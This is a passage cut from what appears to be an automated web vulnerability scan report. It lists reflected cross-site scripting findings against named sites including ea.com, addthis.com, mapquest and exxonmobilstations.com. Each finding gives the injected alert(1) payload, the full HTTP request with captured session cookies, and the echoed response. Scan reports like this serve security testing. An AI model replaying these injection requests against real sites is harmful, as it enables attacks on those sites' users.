<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/a367c"><script>alert(1)</script>ae4ac210b80" />
...[SNIP]...
4.139. http://web-static.ea.com/us/portal/js/jquery/jquery.labelinput.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.labelinput.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 567d0"><script>alert(1)</script>98d32ffa9bc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/567d0"><script>alert(1)</script>98d32ffa9bc?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/567d0"><script>alert(1)</script>98d32ffa9bc" />
...[SNIP]...
4.140. http://web-static.ea.com/us/portal/js/jquery/jquery.pagination.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.pagination.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 831bd"><script>alert(1)</script>7497a0ae74c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/831bd"><script>alert(1)</script>7497a0ae74c?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/831bd"><script>alert(1)</script>7497a0ae74c" />
...[SNIP]...
4.141. http://web-static.ea.com/us/portal/js/jquery/jquery.slider.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.slider.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cef64"><script>alert(1)</script>b67955c2239 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/cef64"><script>alert(1)</script>b67955c2239?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/cef64"><script>alert(1)</script>b67955c2239" />
...[SNIP]...
4.142. http://web-static.ea.com/us/portal/js/jquery/jquery.sortlist.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.sortlist.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59635"><script>alert(1)</script>cbba35aa5c1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/59635"><script>alert(1)</script>cbba35aa5c1?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/59635"><script>alert(1)</script>cbba35aa5c1" />
...[SNIP]...
4.143. http://web-static.ea.com/us/portal/js/jquery/jquery.spotlight.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.spotlight.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abc04"><script>alert(1)</script>e547221dfcb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/abc04"><script>alert(1)</script>e547221dfcb?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:16 GMT
Date: Fri, 24 Jun 2011 14:09:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/abc04"><script>alert(1)</script>e547221dfcb" />
...[SNIP]...
4.144. http://web-static.ea.com/us/portal/js/jquery/jquery.tab.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.tab.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 160c2"><script>alert(1)</script>31a872bdf89 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/160c2"><script>alert(1)</script>31a872bdf89?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/160c2"><script>alert(1)</script>31a872bdf89" />
...[SNIP]...
4.145. http://web-static.ea.com/us/portal/js/jquery/jquery.validate-1.5.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.validate-1.5.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 100bf"><script>alert(1)</script>17b3cdbf2ef was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/100bf"><script>alert(1)</script>17b3cdbf2ef?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:17 GMT
Date: Fri, 24 Jun 2011 14:09:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/100bf"><script>alert(1)</script>17b3cdbf2ef" />
...[SNIP]...
4.146. http://web-static.ea.com/us/portal/js/swfobject/swfobject.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/swfobject/swfobject.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bcc7"><script>alert(1)</script>58f3214276b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/swfobject/4bcc7"><script>alert(1)</script>58f3214276b?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30489
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:16 GMT
Date: Fri, 24 Jun 2011 14:09:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/swfobject/4bcc7"><script>alert(1)</script>58f3214276b" />
...[SNIP]...
4.147. http://web.sa.mapquest.com/mobil1/ [tempset parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.sa.mapquest.com
Path:   /mobil1/

Issue detail

The value of the tempset request parameter is copied into the HTML document as plain text between tags. The payload d16b2<script>alert(1)</script>d862442eea2 was submitted in the tempset parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobil1/?tempset=searchd16b2<script>alert(1)</script>d862442eea2 HTTP/1.1
Host: web.sa.mapquest.com
Proxy-Connection: keep-alive
Referer: http://exxon.com/USA-English/GFM/lubricants.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
MIME-Version: 1.0
Date: Fri, 24 Jun 2011 13:32:47 GMT
Server: AOLserver/4.0.10
Content-Type: text/html; charset=iso-8859-1
ntCoent-Length: 80
Connection: close
Content-Length: 80


Could not locate searchd16b2<script>alert(1)</script>d862442eea2_query.html


4.148. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a6950<script>alert(1)</script>c6127f288fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.phpa6950<script>alert(1)</script>c6127f288fe?v=250&winname=addthis&pub=asepyanm&source=tbx-250,max-250&lng=en&s=hotmail&url=http%3A%2F%2Fbeta.telkom.co.id%2Fpojok-media%2Fsiaran-pers%2Ftelkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html&title=TELKOM%20-%20Telkom%20Meraih%20IMAC%20Award%20sebagai%20The%20Best%20Provider%20and%20Telecommuncation&ate=AT-asepyanm/-/-/4e048e7fb62f9138/4/4dce8a530508b02d&frommenu=1&uid=4dce8a530508b02d&ct=1&pre=http%3A%2F%2Fbeta.telkom.co.id%2Fpojok-media%2Fsiaran-pers%2F&tt=0 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; uid=4dce8a530508b02d; psc=3; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308921511.3N|1308911539.1EY|1308911539.60|1308911539.1FE|1308911539.1WV|1308225884.1VV|1308225884.19F|1306359996.1OD; bt=1308921511|00004N010; dt=X; ssh=eJwzMjA0NDAzMrFKS0xOTcrPz9YxBAAv8wVi; sshs=facebook; Coyote-2-a0f0083=a0f02a8:0

Response

HTTP/1.0 404 Not Found
Date: Fri, 24 Jun 2011 13:19:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Content-Length: 1906
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.phpa6950<script>alert(1)</script>c6127f288fe?v=250&winname=addthis&pub=asepyanm&source=tbx-250,max-250&lng=en&s=hotmail&url=http%3A%2F%2Fbeta.telkom.co.id%2Fpojok-media%2Fsiaran-pers%2Ftelkom-meraih-imac-award-sebagai-the-best-provider-and-telec
...[SNIP]...
4.149. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89132"-alert(1)-"54224a98369 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php89132"-alert(1)-"54224a98369?v=250&winname=addthis&pub=asepyanm&source=tbx-250,max-250&lng=en&s=hotmail&url=http%3A%2F%2Fbeta.telkom.co.id%2Fpojok-media%2Fsiaran-pers%2Ftelkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html&title=TELKOM%20-%20Telkom%20Meraih%20IMAC%20Award%20sebagai%20The%20Best%20Provider%20and%20Telecommuncation&ate=AT-asepyanm/-/-/4e048e7fb62f9138/4/4dce8a530508b02d&frommenu=1&uid=4dce8a530508b02d&ct=1&pre=http%3A%2F%2Fbeta.telkom.co.id%2Fpojok-media%2Fsiaran-pers%2F&tt=0 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; uid=4dce8a530508b02d; psc=3; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308921511.3N|1308911539.1EY|1308911539.60|1308911539.1FE|1308911539.1WV|1308225884.1VV|1308225884.19F|1306359996.1OD; bt=1308921511|00004N010; dt=X; ssh=eJwzMjA0NDAzMrFKS0xOTcrPz9YxBAAv8wVi; sshs=facebook; Coyote-2-a0f0083=a0f02a8:0

Response

HTTP/1.0 404 Not Found
Date: Fri, 24 Jun 2011 13:19:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Content-Length: 1880
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php89132"-alert(1)-"54224a98369?source=tbx-250%2Cmax-250";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</sc
...[SNIP]...
4.150. http://www.ea.com/json/user-menu [returnUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ea.com
Path:   /json/user-menu

Issue detail

The value of the returnUrl request parameter is copied into the HTML document as plain text between tags. The payload 18bd9<img%20src%3da%20onerror%3dalert(1)>2c4a66b853f was submitted in the returnUrl parameter. This input was echoed as 18bd9<img src=a onerror=alert(1)>2c4a66b853f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /json/user-menu?returnUrl=http%3A%2F%2Fwww.ea.com%2F1%2Fproduct-eulas18bd9<img%20src%3da%20onerror%3dalert(1)>2c4a66b853f&_=1308923169682 HTTP/1.1
Host: www.ea.com
Proxy-Connection: keep-alive
Referer: http://www.ea.com/1/product-eulas
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_cc=true; evar1=Not%20Logged%20In; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%252528openPositionedWindow%252528%252527http%25253A//www.info.ea.com%252527%25252C%25252520%252527info%252527%25252C%25252520780%25252C%25252520800%25252C%252525200%25252C%252525200%25252C%25252520t%2526ot%253DA%26eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:47:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 727
Content-Type: text/html; charset=utf-8

{"html":"<div id=\"mod-user-menu\">\n\t<div class=\"mod-header\"><\/div>\n\t<div class=\"mod-content\">\n\t\t<div class=\"content\">\n\t\t\t<ul>\n\t\t\t<li class=\"login\" title=\"Login\"><a href=\"https:\/\/www.ea.com\/profile\/login?returnurl=http:\/\/www.ea.com\/1\/product-eulas18bd9<img src=a onerror=alert(1)>2c4a66b853f\" id=\"mod-user-menu-login\">
...[SNIP]...
4.151. http://www.exxonmobilstations.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.exxonmobilstations.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ce8fd<script>alert(1)</script>e6edce38167 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoce8fd<script>alert(1)</script>e6edce38167 HTTP/1.1
Host: www.exxonmobilstations.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6m0100r2iivameub0gdtubf65; style=medium

Response

HTTP/1.1 404 Not Found
Date: Fri, 24 Jun 2011 13:55:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 343
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.icoce8fd<script>alert(1)</script>e6edce38167 was not found on this server.</p>
...[SNIP]...
4.152. http://www.exxonmobilstations.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.exxonmobilstations.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bccb9<script>alert(1)</script>ded9f352e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?bccb9<script>alert(1)</script>ded9f352e0=1 HTTP/1.1
Host: www.exxonmobilstations.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6m0100r2iivameub0gdtubf65; style=medium

Response

HTTP/1.1 404 Not Found
Date: Fri, 24 Jun 2011 13:55:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 345
